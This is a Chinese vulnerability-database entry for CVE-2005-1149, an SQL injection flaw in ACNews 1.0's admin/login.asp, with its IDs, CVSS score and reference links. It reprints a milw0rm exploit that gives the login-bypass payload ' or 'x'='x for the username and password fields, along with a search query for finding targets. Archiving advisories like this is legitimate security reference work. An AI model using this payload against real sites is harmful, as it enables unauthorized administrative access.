ACNews Login.ASP SQL注入漏洞-安全小百科

ACNews Login.ASP SQL注入漏洞

漏洞ID	1108640	漏洞类型	SQL注入
发布时间	2005-04-09	更新时间	2005-10-20
CVE编号	CVE-2005-1149	CNNVD-ID	CNNVD-200504-034
漏洞平台	ASP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/925
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-034

|漏洞详情

ACNews1.0的aspclick.it中的admin/login.asp页面存在SQL注入漏洞，允许远程攻击者借助(1)username或(2)password参数，执行任意SQL指令。

|漏洞EXP

# http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team

# milw0rm.com [2005-04-09]

|参考资料

来源:BID
名称:13148
链接:http://www.securityfocus.com/bid/13148
来源:OSVDB
名称:15494
链接:http://www.osvdb.org/15494
来源:SECTRACK
名称:1013681
链接:http://securitytracker.com/id?1013681

相关推荐: Zope ZClass Modification DOS Vulnerability

Zope ZClass Modification DOS Vulnerability 漏洞ID 1103445 漏洞类型 Access Validation Error 发布时间 2001-02-15 更新时间 2001-02-15 CVE编号 N/A CNN…

文章版权归作者所有，未经允许请勿转载。

THE END